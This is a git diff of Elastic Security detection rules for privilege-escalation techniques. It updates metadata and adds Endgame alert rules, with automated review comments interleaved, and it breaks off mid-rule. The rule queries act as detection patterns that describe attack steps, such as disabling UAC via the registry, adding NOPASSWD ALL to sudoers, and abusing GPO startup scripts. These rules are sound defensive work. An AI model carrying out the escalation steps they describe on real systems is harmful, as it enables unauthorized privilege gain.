diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json index d87e6bf6d5c9a..bc0b84823273d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json 
@@ -12,15 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Disabling User Account Control via Registry Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "registry where event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ "https://www.greyhathacker.net/?p=796", "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", 
@@ -77,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json index 6023854cd6641..616f8299f6878 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json @@ -12,6 +12,23 @@ "license": "Elastic License v2", "name": "Potential Privilege Escalation via Sudoers File Modification", "query": "event.category:process and event.type:start and process.args:(echo and *NOPASSWD*ALL*)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76152ca1-71d0-4003-9e37-0983e12832da", "severity": "high", @@ -49,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json new file mode 100644 index 0000000000000..65bd25cd01aea --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json 
@@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Manipulation - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c0be5f31-e180-48ed-aa08-96b36899d48f", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json new file mode 100644 index 0000000000000..98a409925d286 
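Review bot: The two non-ECS entries in `required_fields` are recorded as `"type": "unknown"`, yet the `query` compares `endgame.metadata.type` and `endgame.event_subtype_full` against literal values, so the rule does depend on their mapping; if the Endgame index mapping is known, recording the actual type (presumably `keyword`) makes the required-fields metadata useful rather than a placeholder. The file is added as new but starts at `"version": 9`, which suggests it is being restored rather than introduced; if a rule with this `rule_id` was shipped before, the version should be higher than the last shipped one for the prepackaged-rule update to apply, which cannot be verified from the hunk. The three Endgame rules that follow (Credential Manipulation Prevented, Permission Theft Detected, Permission Theft Prevented) share both points.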
--- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Manipulation - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json new file mode 100644 index 0000000000000..25c9e287f2b80 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json 
@@ -0,0 +1,71 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame detected Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Permission Theft - Detected - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "c3167e1b-f73c-41be-b60b-87f4df707fe3",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1134",
+ "name": "Access Token Manipulation",
+ "reference": "https://attack.mitre.org/techniques/T1134/"
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json
new file mode 100644
index 0000000000000..4298d427d3d13
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json
@@ -0,0 +1,71 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame prevented Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Permission Theft - Prevented - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "453f659e-0429-40b1-bfdb-b6957286e04b",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1134",
+ "name": "Access Token Manipulation",
+ "reference": "https://attack.mitre.org/techniques/T1134/"
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json
new file mode 100644
index 0000000000000..708faeb0a28bd
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json
@@ -0,0 +1,71 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame detected Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Process Injection - Detected - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 73,
+ "rule_id": "80c52164-c82a-402c-9964-852533d58be1",
+ "severity": "high",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1055",
+ "name": "Process Injection",
+ "reference": "https://attack.mitre.org/techniques/T1055/"
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json
new file mode 100644
index 0000000000000..f89e54d26e688
--- /dev/null
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json
@@ -0,0 +1,71 @@
+{
+ "author": [
+ "Elastic"
+ ],
+ "description": "Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.",
+ "from": "now-15m",
+ "index": [
+ "endgame-*"
+ ],
+ "interval": "10m",
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "max_signals": 10000,
+ "name": "Process Injection - Prevented - Elastic Endgame",
+ "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n",
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "endgame.event_subtype_full",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "endgame.metadata.type",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "990838aa-a953-4f3e-b3cb-6ddf7584de9e",
+ "severity": "medium",
+ "tags": [
+ "Elastic",
+ "Elastic Endgame",
+ "Threat Detection",
+ "Privilege Escalation"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1055",
+ "name": "Process Injection",
+ "reference": "https://attack.mitre.org/techniques/T1055/"
+ }
+ ]
+ }
+ ],
+ "type": "query",
+ "version": 9
+}
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json
index 32c47afd93019..7c44e14efa169 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json
@@ -11,11 +11,33 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Execution with Explicit Credentials via Scripting",
- "query": "event.category:process and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or perl* or php* or ruby or pwsh)\n",
+ "query": "event.category:process and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh)\n",
 "references": [
 "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf",
 "https://www.manpagez.com/man/8/security_authtrampoline/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1",
 "severity": "medium",
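Review bot: The new `or Python` term in the `process.parent.name` list is an exact match, unlike its neighbour `python*`, so on a keyword field it only fires for a parent literally named `Python` and not for a versioned variant; if the intent is to cover the capitalised interpreter the way the lowercase entry does, `python* or Python* or perl*` would be the consistent form. If the exact match is deliberate, a one-line rationale in the rule's description or a `note` would stop the next maintainer from "fixing" it. The rest of the rule object lies outside this hunk.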
@@ -40,6 +62,18 @@
 "id": "T1078",
 "name": "Valid Accounts",
 "reference": "https://attack.mitre.org/techniques/T1078/"
+ },
+ {
+ "id": "T1548",
+ "name": "Abuse Elevation Control Mechanism",
+ "reference": "https://attack.mitre.org/techniques/T1548/",
+ "subtechnique": [
+ {
+ "id": "T1548.004",
+ "name": "Elevated Execution with Prompt",
+ "reference": "https://attack.mitre.org/techniques/T1548/004/"
+ }
+ ]
 }
 ]
 },
@@ -61,5 +95,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json
index 0c30cbb23b56b..3b7b0651cefc1 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json
@@ -18,6 +18,33 @@
 "references": [
 "https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7",
 "severity": "high",
@@ -47,5 +74,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json
index bc44e9cf35116..210e7df9491fc 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json
@@ -12,15 +12,44 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Kubernetes Rolebindings Created or Patched",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(io.k8s.authorization.rbac.v*.clusterrolebindings.create or \nio.k8s.authorization.rbac.v*.rolebindings.create or io.k8s.authorization.rbac.v*.clusterrolebindings.patch or \nio.k8s.authorization.rbac.v*.rolebindings.patch) and event.outcome:success and\nnot gcp.audit.authentication_info.principal_email:\"system:addon-manager\"\n",
+ "note": "",
+ "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(io.k8s.authorization.rbac.v*.clusterrolebindings.create or\nio.k8s.authorization.rbac.v*.rolebindings.create or io.k8s.authorization.rbac.v*.clusterrolebindings.patch or\nio.k8s.authorization.rbac.v*.rolebindings.patch) and event.outcome:success and\nnot gcp.audit.authentication_info.principal_email:\"system:addon-manager\"\n",
 "references": [
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
 "https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "gcp.audit.authentication_info.principal_email",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "2f0bae2d-bf20-4465-be86-1311addebaa3",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -43,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json
index 8ed57e28caaaf..63f1d51ec90ab 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json
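Review bot: `"note": ""` leaves an empty string behind once the Config paragraph moved into the new `setup` field; the newly added Endgame rules earlier in this diff carry no `note` key at all, so unless the rule schema requires the key to be present, dropping it here would be cleaner than an empty value. Separately, `related_integrations` pins `gcp` to `"1.10.0"` while the query still accepts both `googlecloud.audit` and `gcp.audit` datasets; it is worth confirming that the version is read as a minimum rather than an exact requirement, otherwise the older dataset name is advertised but not backed by the integration reference. The hunk covers only the middle of the rule object.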
@@ -13,15 +13,53 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of\nclients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the\n`scripts.ini` or `psscripts.ini` files. The scripts are stored in the following path: `\\Machine\\Scripts\\`,\n`\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to 
improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nObject Access > \nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of\nclients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the\n`scripts.ini` or `psscripts.ini` files. 
The scripts are stored in the following path: `\\Machine\\Scripts\\`,\n`\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n 
winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", "https://labs.f-secure.com/tools/sharpgpoabuse" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success 